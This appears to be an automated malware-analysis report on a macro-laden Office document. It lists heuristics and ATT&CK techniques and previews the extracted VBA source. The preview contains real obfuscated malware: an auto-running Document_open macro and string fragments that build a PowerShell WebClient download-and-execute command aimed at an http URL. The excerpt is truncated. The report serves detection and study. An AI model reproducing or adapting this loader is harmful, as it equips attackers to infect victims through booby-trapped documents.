MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary code. This macro likely serves to download and execute a secondary payload, a common technique for malware delivery. The presence of VBA macros and the execution of Shell() strongly suggest a macro-based attack.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35913 bytes |
SHA-256: f1b359684b2a80ca39a8e212a538f9d80303c9f58c082f3f6c19a050bc848f4a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "whItoJm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub IMsYT(jukrN)
aufEaz = 6921 * NjOEZR + 93876 * ChrB(16150 * Rnd(13473) - 22021 + dMJUUM) - 50275 - Rnd(CMuYv) + 1116 - htriqW * 96359 * Chr(wYznw)
End Sub
Sub JYnZz(nQZKrA)
BdTKTD = 67724 * DRYUVi + 87704 * ChrB(21364 * Rnd(92320) - 44686 + bKtoG) - 99062 - Rnd(QDQThq) + 80891 - wofNij * 29739 * Chr(FHOEd)
tFdmS = 48300 * IoMLWn + 61949 * ChrB(38501 * Rnd(69771) - 68870 + ijiEfi) - 85871 - Rnd(Msnhsu) + 35177 - JKpuY * 32597 * Chr(oASCH)
jwVXjZ = 88645 * pavud + 25222 * ChrB(64381 * Rnd(40122) - 14571 + QEdWJ) - 89780 - Rnd(JNYtEM) + 62268 - tcuRKL * 40561 * Chr(mUkuz)
End Sub
Sub DiTswl(SMoah)
MVikN = 28646 * kknCz + 17342 * ChrB(91057 * Rnd(62164) - 81537 + ZApOJ) - 88488 - Rnd(MOuha) + 31536 - rcnJC * 16777 * Chr(XfqKTr)
upqWc = 18680 * asICb + 9206 * ChrB(46758 * Rnd(98299) - 38861 + KThLVV) - 73659 - Rnd(hSCUwE) + 81706 - IRYEK * 96162 * Chr(qQkfG)
End Sub
Private Sub Document_open()
On Error Resume Next
DLYLOA = 99056 * FZUEs + 89690 * ChrB(82408 * Rnd(25393) - 10501 + DLYwHa) - 30504 - Rnd(MNqvl) + 80655 - DdHdJk * 8532 * Chr(tDrDAR)
pwFUiSLsr (PdLqb + qsRdlRBDsEsoq + BHEzvz)
mTJoiY = 79275 * jjvJz + 39653 * ChrB(61080 * Rnd(85974) - 30027 + PzIzN) - 69053 - Rnd(OjCWDj) + 27596 - QEatCZ * 53088 * Chr(mjuPhb)
End Sub
Sub VOoafw(oFZuQo)
ujChWj = 30524 * zMwnW + 42911 * ChrB(32843 * Rnd(36935) - 39219 + mJjHO) - 12905 - Rnd(olPUTI) + 17382 - przriL * 85934 * Chr(QPcbr)
IXmFhd = 60622 * nSvwi + 95820 * ChrB(99822 * Rnd(71626) - 60049 + pBhiR) - 52949 - Rnd(BuwQrm) + 59246 - McshOa * 61354 * Chr(jDhvj)
uKikXm = 82272 * iGKTji + 63831 * ChrB(80644 * Rnd(93678) - 61517 + IWVHD) - 32664 - Rnd(Jtzajf) + 5818 - znlGO * 84641 * Chr(RwlWut)
End Sub
Sub atHBib(ZDbTu)
zwDXfQ = 16830 * tEqRYI + 8303 * ChrB(44782 * Rnd(42216) - 62422 + jMTET) - 64813 - Rnd(bRZkK) + 74112 - OCVuO * 83735 * Chr(lNjoQk)
End Sub
Sub SCChu(KRdrjp)
orJJtD = 95692 * FjcHo + 83184 * ChrB(97431 * Rnd(97921) - 75501 + DzuJO) - 45792 - Rnd(PoJzZ) + 56177 - ZMqtD * 43320 * Chr(MmvNTZ)
GGMSqc = 62600 * kfclHi + 29043 * ChrB(77965 * Rnd(25839) - 61656 + RicAF) - 90934 - Rnd(UqLzv) + 90999 - cJizij * 2112 * Chr(hcLQRP)
End Sub
Attribute VB_Name = "zzihNIrdF"
Sub XZHqj(jhniVj)
iwEmAz = 79683 * dBEsNR + 28030 * ChrB(65350 * Rnd(80066) - 70851 + cqHJto) - 1871 - Rnd(cjdkvQ) + 12325 - kIWriQ * 35444 * Chr(YDzSTU)
End Sub
Function qsRdlRBDsEsoq()
On Error Resume Next
EDXVn = 26484 * wljSNN + 25654 * ChrB(48838 * Rnd(39834) - 33785 + dQUfUW) - 35835 - Rnd(nOmvmU) + 3699 - zlGmMa * 92581 * Chr(BZNpA)
ibccJPaL = CDMRFI("3ZhJ9'+'+ZxI57ZxI+ZxINgFZxI+ZxItN(),ZxI+ZxI 64vSZxI+ZxIDC)'+';&(ZxI+ZxIHUaZxI+ZxI'+'InvoHUaZxI+ZxI+ZxI+ZxIHUZxI+ZxIak'+'HZxI+ZxIUa+HUZxI+ZxIae-ItZxI+ZxIemHUZxI+Zxs,", qApvaz - qApvaz + 6 + qApvaz - qApvaz, qApvaz - qApvaz + 157 + qApvaz - qApvaz)
HNSXrj = 96912 * jBCza + 53663 * ChrB(17681 * Rnd(80384) - 93680 + LdNnOi) - 50419 - Rnd(UHivI) + 56328 - NHZcPc * 41152 * Chr(aCEkNA)
jzGVwk = 18598 * AkUXw + 20177 * ChrB(74442 * Rnd(52517) - 9103 + viBwIE) - 89887 - Rnd(jIaSL) + 51521 - MHjSNq * 17434 * Chr(XMCHwB)
XhjhbK = CDMRFI("b.ZTVxIClient;64vZxI+ZxINSB = 64vnsZxI+ZxIadasZxI+ZxId.nextZxI+ZxI(10'+'000,ZxI+ZxI 282133)ZxI+ZxI;64vZxI+ZxIAZxI+ZxIDCX = HUa ZxI+ZxI hZxI+ZxItZxI+ZxItp:ZxI+ZxI/ZxI+ZxI/1ZxI+ZxI8EaY3", DLcPi - DLcPi + 6 + DLcPi - DLcPi, DLcPi - DLcPi + 174 + DLcPi - DLcPi)
HlcVb = 60298 * kpCanA + 2157 * ChrB(78345 * Rnd(64966) - 46474 + qlCGIr) - 93460 - Rnd(HijGzz) + 18803 - Bpqqw * 4338 * Chr(XqQmCI)
zmmQk = 17725 * IIfuU + 2609 * ChrB(15855 * Rnd(25399) - 35310 + QYjYOb) - 47512 - Rnd(wobbzq) + 46449 - CZwAji * 18844 * Chr(ZcFlKJ)
zFpYL = CDMRFI("BCAtlT1+'ZxI+ZxI(HUa@ZxI+ZxIHZxI+ZxIUa);64vZxI+ZxISZxI+ZxIDZxI+ZxIC ZxI+ZxIrd", iiiNG - iiiNG + 8 + iiiNG - iiiNG, iiiNG - iiiNG + 68 + iiiNG - iiiNG)
rcbENA = 2219 * KNdmUw + 6
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.